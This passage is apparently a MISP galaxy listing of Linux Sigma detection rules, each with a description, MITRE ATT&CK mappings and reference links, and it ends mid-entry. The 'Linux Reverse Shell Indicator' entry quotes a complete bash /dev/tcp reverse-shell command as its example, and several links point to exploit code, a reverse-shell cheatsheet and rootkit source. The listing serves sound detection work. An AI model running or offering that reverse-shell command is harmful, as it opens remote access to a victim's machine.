  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11536. Table References

Links

Internal Research - mostly derived from exploit code including code in MSF[Internal Research - mostly derived from exploit code including code in MSF]

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml

Hidden Files and Directories

Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character

The tag is: misp-galaxy:sigma-rules="Hidden Files and Directories"

Hidden Files and Directories has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 11537. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml

Creation Of An User Account

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:sigma-rules="Creation Of An User Account"

Creation Of An User Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 11538. Table References

Links

https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07

https://access.redhat.com/articles/4409591#audit-record-types-2

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml

Shellshock Expression

Detects shellshock expressions in log files

The tag is: misp-galaxy:sigma-rules="Shellshock Expression"

Shellshock Expression has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11540. Table References

Links

https://owasp.org/www-pdf-archive/Shellshock-_Tudor_Enache.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml

Remote File Copy

Detects the use of tools that copy files from or to remote systems

The tag is: misp-galaxy:sigma-rules="Remote File Copy"

Remote File Copy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11541. Table References

Links

https://attack.mitre.org/techniques/T1105/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml

Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

The tag is: misp-galaxy:sigma-rules="Equation Group Indicators"

Equation Group Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11542. Table References

Links

https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml

Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd

The tag is: misp-galaxy:sigma-rules="Symlink Etc Passwd"

Symlink Etc Passwd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 11543. Table References

Links

https://www.qualys.com/2021/05/04/21nails/21nails.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml

Potential Suspicious BPF Activity - Linux

Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious BPF Activity - Linux"

Table 11544. Table References

Links

https://man7.org/linux/man-pages/man7/bpf-helpers.7.html

https://redcanary.com/blog/ebpf-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml

Commands to Clear or Remove the Syslog - Builtin

Detects specific commands commonly used to remove or empty the syslog

The tag is: misp-galaxy:sigma-rules="Commands to Clear or Remove the Syslog - Builtin"

Commands to Clear or Remove the Syslog - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11545. Table References

Links

https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml

Buffer Overflow Attempts

Detects buffer overflow attempts in Unix system log files

The tag is: misp-galaxy:sigma-rules="Buffer Overflow Attempts"

Buffer Overflow Attempts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 11546. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml

Suspicious Reverse Shell Command Line

Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell

The tag is: misp-galaxy:sigma-rules="Suspicious Reverse Shell Command Line"

Suspicious Reverse Shell Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11547. Table References

Links

https://alamot.github.io/reverse_shells/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml

Suspicious Log Entries

Detects suspicious log entries in Linux log files

The tag is: misp-galaxy:sigma-rules="Suspicious Log Entries"

Table 11548. Table References

Links

https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml

Privileged User Has Been Created

Detects the addition of a new user to a privileged group such as "root" or "sudo"

The tag is: misp-galaxy:sigma-rules="Privileged User Has Been Created"

Privileged User Has Been Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11549. Table References

Links

https://linux.die.net/man/8/useradd

https://digital.nhs.uk/cyber-alerts/2018/cc-2825

https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml

Nimbuspwn Exploitation

Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)

The tag is: misp-galaxy:sigma-rules="Nimbuspwn Exploitation"

Nimbuspwn Exploitation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 11550. Table References

Links

https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/

https://github.com/Immersive-Labs-Sec/nimbuspwn

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml

JexBoss Command Sequence

Detects suspicious command sequence that JexBoss

The tag is: misp-galaxy:sigma-rules="JexBoss Command Sequence"

JexBoss Command Sequence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11551. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-312A

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml

Space After Filename

Detects space after filename

The tag is: misp-galaxy:sigma-rules="Space After Filename"

Table 11552. Table References

Links

https://attack.mitre.org/techniques/T1064

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml

Code Injection by ld.so Preload

Detects the ld.so preload persistence file. See man ld.so for more information.

The tag is: misp-galaxy:sigma-rules="Code Injection by ld.so Preload"

Code Injection by ld.so Preload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"

Table 11553. Table References

Links

https://man7.org/linux/man-pages/man8/ld.so.8.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml

Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

The tag is: misp-galaxy:sigma-rules="Suspicious Activity in Shell Commands"

Suspicious Activity in Shell Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11554. Table References

Links

https://artkond.com/2017/03/23/pivoting-guide/

http://pastebin.com/FtygZ1cg

https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml

Clear Command History

Clear command history in linux which is used for defense evasion.

The tag is: misp-galaxy:sigma-rules="Clear Command History"

Clear Command History has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 11555. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md

https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml

Guacamole Two Users Sharing Session Anomaly

Detects suspicious session with two users present

The tag is: misp-galaxy:sigma-rules="Guacamole Two Users Sharing Session Anomaly"

Guacamole Two Users Sharing Session Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 11556. Table References

Links

https://research.checkpoint.com/2020/apache-guacamole-rce/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml

Suspicious VSFTPD Error Messages

Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

The tag is: misp-galaxy:sigma-rules="Suspicious VSFTPD Error Messages"

Suspicious VSFTPD Error Messages has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11557. Table References

Links

https://github.com/dagwieers/vsftpd/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml

Relevant ClamAV Message

Detects relevant ClamAV messages

The tag is: misp-galaxy:sigma-rules="Relevant ClamAV Message"

Relevant ClamAV Message has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"

Table 11558. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml

Modifying Crontab

Detects suspicious modification of crontab file.

The tag is: misp-galaxy:sigma-rules="Modifying Crontab"

Modifying Crontab has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11559. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml

PwnKit Local Privilege Escalation

Detects potential PwnKit exploitation CVE-2021-4034 in auth logs

The tag is: misp-galaxy:sigma-rules="PwnKit Local Privilege Escalation"

PwnKit Local Privilege Escalation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

Table 11560. Table References

Links

https://twitter.com/wdormann/status/1486161836961579020

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml

SSHD Error Message CVE-2018-15473

Detects exploitation attempt using public exploit code for CVE-2018-15473

The tag is: misp-galaxy:sigma-rules="SSHD Error Message CVE-2018-15473"

SSHD Error Message CVE-2018-15473 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"

Table 11561. Table References

Links

https://github.com/Rhynorater/CVE-2018-15473-Exploit

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml

Suspicious OpenSSH Daemon Error

Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

The tag is: misp-galaxy:sigma-rules="Suspicious OpenSSH Daemon Error"

Suspicious OpenSSH Daemon Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11562. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml

https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml

Sudo Privilege Escalation CVE-2019-14287 - Builtin

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

The tag is: misp-galaxy:sigma-rules="Sudo Privilege Escalation CVE-2019-14287 - Builtin"

Sudo Privilege Escalation CVE-2019-14287 - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 11563. Table References

Links

https://twitter.com/matthieugarin/status/1183970598210412546

https://www.openwall.com/lists/oss-security/2019/10/14/1

https://access.redhat.com/security/cve/cve-2019-14287

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml

Suspicious Named Error

Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

The tag is: misp-galaxy:sigma-rules="Suspicious Named Error"

Suspicious Named Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11564. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml

Disabling Security Tools - Builtin

Detects disabling security tools

The tag is: misp-galaxy:sigma-rules="Disabling Security Tools - Builtin"

Disabling Security Tools - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11565. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml

Persistence Via Cron Files

Detects creation of cron file or files in Cron directories which could indicates potential persistence.

The tag is: misp-galaxy:sigma-rules="Persistence Via Cron Files"

Persistence Via Cron Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11566. Table References

Links

https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml

Wget Creating Files in Tmp Directory

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"

The tag is: misp-galaxy:sigma-rules="Wget Creating Files in Tmp Directory"

Wget Creating Files in Tmp Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11567. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml

Persistence Via Sudoers Files

Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.

The tag is: misp-galaxy:sigma-rules="Persistence Via Sudoers Files"

Persistence Via Sudoers Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11569. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml

Triple Cross eBPF Rootkit Default LockFile

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Default LockFile"

Table 11570. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml

Triple Cross eBPF Rootkit Default Persistence

Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Default Persistence"

Triple Cross eBPF Rootkit Default Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11571. Table References

Links

https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml

Linux Doas Conf File Creation

Detects the creation of doas.conf file in linux host platform.

The tag is: misp-galaxy:sigma-rules="Linux Doas Conf File Creation"

Linux Doas Conf File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11572. Table References

Links

https://www.makeuseof.com/how-to-install-and-use-doas/

https://research.splunk.com/endpoint/linux_doas_conf_file_creation/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

The tag is: misp-galaxy:sigma-rules="Communication To Ngrok Tunneling Service - Linux"

Communication To Ngrok Tunneling Service - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 11573. Table References

Links

https://twitter.com/hakluke/status/1587733971814977537/photo/1

https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

The tag is: misp-galaxy:sigma-rules="Linux Reverse Shell Indicator"

Linux Reverse Shell Indicator has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11574. Table References

Links

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

The tag is: misp-galaxy:sigma-rules="Linux Crypto Mining Pool Connections"

Linux Crypto Mining Pool Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 11575. Table References

Links

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml

Sudo Privilege Escalation CVE-2019-14287

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

The tag is: misp-galaxy:sigma-rules="Sudo Privilege Escalation CVE-2019-14287"

Sudo Privilege Escalation CVE-2019-14287 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 11576. Table References

Links

https://twitter.com/matthieugarin/status/1183970598210412546

https://www.openwall.com/lists/oss-security/2019/10/14/1

https://access.redhat.com/security/cve/cve-2019-14287

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml

Decode Base64 Encoded Text

Detects usage of base64 utility to decode arbitrary base64-encoded text

The tag is: misp-galaxy:sigma-rules="Decode Base64 Encoded Text"

Decode Base64 Encoded Text has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 11577. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml

Linux Remote System Discovery

Detects the enumeration of other remote systems.

The tag is: misp-galaxy:sigma-rules="Linux Remote System Discovery"

Linux Remote System Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 11579. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml

Disabling Security Tools

Detects disabling security tools

The tag is: misp-galaxy:sigma-rules="Disabling Security Tools"

Disabling Security Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11580. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml

Triple Cross eBPF Rootkit Execve Hijack

Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Execve Hijack"

Table 11581. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml

Vim GTFOBin Abuse - Linux

Detects usage of "vim" and it’s siblings as a GTFOBin to execute and proxy command and binary execution

The tag is: misp-galaxy:sigma-rules="Vim GTFOBin Abuse - Linux"

Vim GTFOBin Abuse - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11582. Table References

Links

https://gtfobins.github.io/gtfobins/vimdiff/

https://gtfobins.github.io/gtfobins/rvim/

https://gtfobins.github.io/gtfobins/vim/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml

Interactive Bash Suspicious Children

Detects suspicious interactive bash as a parent to rather uncommon child processes

The tag is: misp-galaxy:sigma-rules="Interactive Bash Suspicious Children"

Interactive Bash Suspicious Children has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11584. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml

File and Directory Discovery - Linux

Detects usage of system utilities to discover files and directories

The tag is: misp-galaxy:sigma-rules="File and Directory Discovery - Linux"

File and Directory Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11585. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml

OS Architecture Discovery Via Grep

Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"

The tag is: misp-galaxy:sigma-rules="OS Architecture Discovery Via Grep"

OS Architecture Discovery Via Grep has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11586. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml

Potential Discovery Activity Using Find - Linux

Detects usage of "find" binary in a suspicious manner to perform discovery

The tag is: misp-galaxy:sigma-rules="Potential Discovery Activity Using Find - Linux"

Potential Discovery Activity Using Find - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11587. Table References

Links

https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml

Clipboard Collection with Xclip Tool

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

The tag is: misp-galaxy:sigma-rules="Clipboard Collection with Xclip Tool"

Clipboard Collection with Xclip Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 11588. Table References

Links

https://www.packetlabs.net/posts/clipboard-data-security/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml

Linux Package Uninstall

Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

The tag is: misp-galaxy:sigma-rules="Linux Package Uninstall"

Linux Package Uninstall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 11589. Table References

Links

https://linuxhint.com/uninstall-debian-packages/

https://linuxhint.com/uninstall_yum_package/

https://sysdig.com/blog/mitre-defense-evasion-falco

https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml

Local System Accounts Discovery - Linux

Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

The tag is: misp-galaxy:sigma-rules="Local System Accounts Discovery - Linux"

Local System Accounts Discovery - Linux has relationships with:

